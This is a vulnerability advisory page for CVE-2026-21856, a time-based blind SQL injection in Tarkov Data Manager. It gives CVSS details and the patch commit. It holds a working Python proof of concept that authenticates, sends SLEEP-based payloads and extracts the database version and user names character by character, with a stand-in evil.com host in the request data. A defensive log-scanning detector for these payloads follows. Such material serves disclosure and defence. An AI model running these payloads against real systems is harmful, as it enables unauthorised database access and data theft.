Security Vulnerability Report
CVE-2026-21856 CVSS 7.2 HIGH

Published: 2026-01-07 19:15:58
Last Modified: 2026-02-03 16:19:37

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8, a time-based blind SQL injection vulnerability in the webhook edit and scanner API endpoints allows an authenticated attacker to execute arbitrary SQL queries against the MySQL database. Commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 contains a patch.

CVSS Details

CVSS Score (Secondary)
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS Score (Primary)
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-89 (SQL Injection)

The two vectors differ only in Privileges Required (PR:H versus PR:L); both rate confidentiality, integrity and availability impact as HIGH, since arbitrary SQL against the MySQL database reads, modifies and can destroy application data.

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE
Tarkov Data Manager < commit 9bdb3a75a98a7047b6d70144eb1da1655d6992a8 (NVD match criteria: versions before 2026-01-02)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2026-21856 Time-Based Blind SQL Injection PoC
# Target: Tarkov Data Manager webhook edit / scanner API endpoints

TARGET_URL = "http://target-server/api/webhook/edit"  # Replace with actual target URL

session = requests.Session()

# Authenticate with high-privilege account
session.post("http://target-server/api/auth/login", json={
    "username": "admin",
    "password": "password"
})


def time_based_blind_sqli(payload):
    """Execute time-based blind SQL injection"""
    headers = {
        "Content-Type": "application/json",
        "X-Auth-Token": session.cookies.get("session_token")
    }
    data = {
        "webhook_id": "1",
        "name": payload,
        "url": "http://evil.com/webhook"
    }
    start_time = time.time()
    response = session.post(TARGET_URL, json=data, headers=headers, timeout=30)
    elapsed = time.time() - start_time
    # The payloads below use SLEEP(5), so the threshold must match that delay
    return elapsed >= 5  # True if SLEEP(5) was executed


# Example: Test if database version contains 'MariaDB'
def extract_db_version():
    """Extract database version using blind SQL injection"""
    charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-"
    result = ""
    for pos in range(1, 50):
        for char in charset:
            payload = f"test' AND IF(SUBSTRING(@@version,{pos},1)='{char}',SLEEP(5),0)-- -"
            if time_based_blind_sqli(payload):
                result += char
                print(f"[*] Extracted: {result}")
                break
        # No character matched at this position: end of the string
        if len(result) == pos - 1:
            break
    return result


# Example: Extract database users
def extract_db_users():
    """Extract MySQL users from database"""
    charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._"
    result = ""
    for pos in range(1, 100):
        for char in charset:
            payload = f"test' AND IF(SUBSTRING(user(),{pos},1)='{char}',SLEEP(5),0)-- -"
            if time_based_blind_sqli(payload):
                result += char
                print(f"[*] User: {result}")
                break
    return result


if __name__ == "__main__":
    print("CVE-2026-21856 Blind SQL Injection Test")
    # Test basic injection
    test_payload = "test' AND SLEEP(5)-- -"
    if time_based_blind_sqli(test_payload):
        print("[!] Vulnerability confirmed - Time delay detected")
    else:
        print("[-] No vulnerability detected or target not vulnerable")
```
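As a defender-side counterpart to the PoC above, here is an added example (not from this page or from the Tarkov Data Manager project) that scans application request logs for the affected endpoints, flags bodies carrying MySQL time-delay payloads, and checks whether the observed request latency confirms the delay actually executed. The JSON-lines log format and the `/api/scanner` path are assumptions; the log lines are constructed.

```python
import json
import re
import statistics

# Constructed sample of application request logs as JSON lines (not real traffic).
# Each record holds the endpoint, the client's JSON body and server-side latency in ms.
SAMPLE_LOG = """
{"path": "/api/webhook/edit", "body": {"webhook_id": "1", "name": "prod-alerts", "url": "https://hooks.example/a"}, "duration_ms": 42}
{"path": "/api/webhook/edit", "body": {"webhook_id": "1", "name": "test' AND SLEEP(5)-- -", "url": "https://hooks.example/a"}, "duration_ms": 5031}
{"path": "/api/webhook/edit", "body": {"webhook_id": "2", "name": "staging", "url": "https://hooks.example/b"}, "duration_ms": 39}
{"path": "/api/scanner", "body": {"name": "test' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)-- -"}, "duration_ms": 47}
{"path": "/api/scanner", "body": {"name": "scanner-7"}, "duration_ms": 51}
"""

# Endpoints the advisory names as injection sinks; "/api/scanner" is an assumed path.
WATCHED_PATHS = ("/api/webhook/edit", "/api/scanner")

# MySQL/MariaDB time-delay primitives, and a closing quote followed by a SQL keyword.
TIME_DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)
QUOTE_SQL_RE = re.compile(r"['\"]\s*(AND|OR|UNION|IF)\b", re.IGNORECASE)


def suspicious_value(body):
    """Return the first string field carrying a time-delay or quote-break pattern, else None."""
    for value in body.values():
        if isinstance(value, str) and (TIME_DELAY_RE.search(value) or QUOTE_SQL_RE.search(value)):
            return value
    return None


def detect_time_based_sqli(log_text, latency_factor=10.0):
    """Flag watched-endpoint requests carrying injection patterns and record whether
    the request's latency (vs. the median of all requests) confirms the delay ran."""
    records = [json.loads(line) for line in log_text.strip().splitlines() if line.strip()]
    baseline = statistics.median(r["duration_ms"] for r in records)
    findings = []
    for rec in records:
        if rec["path"] not in WATCHED_PATHS:
            continue
        hit = suspicious_value(rec["body"])
        if hit is not None:
            findings.append({
                "path": rec["path"],
                "field_value": hit,
                "delay_confirmed": rec["duration_ms"] > baseline * latency_factor,
            })
    return findings
```

A finding with `delay_confirmed` set is the strongest signal, since it means the injected SLEEP() reached the database rather than being rejected by validation; the unconfirmed finding still shows a probing attempt worth alerting on.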

References

https://github.com/the-hideout/tarkov-data-manager/commit/9bdb3a75a98a7047b6d70144eb1da1655d6992a8 (Patch)
https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-4gcx-ghwc-rc78 (Exploit, Vendor Advisory)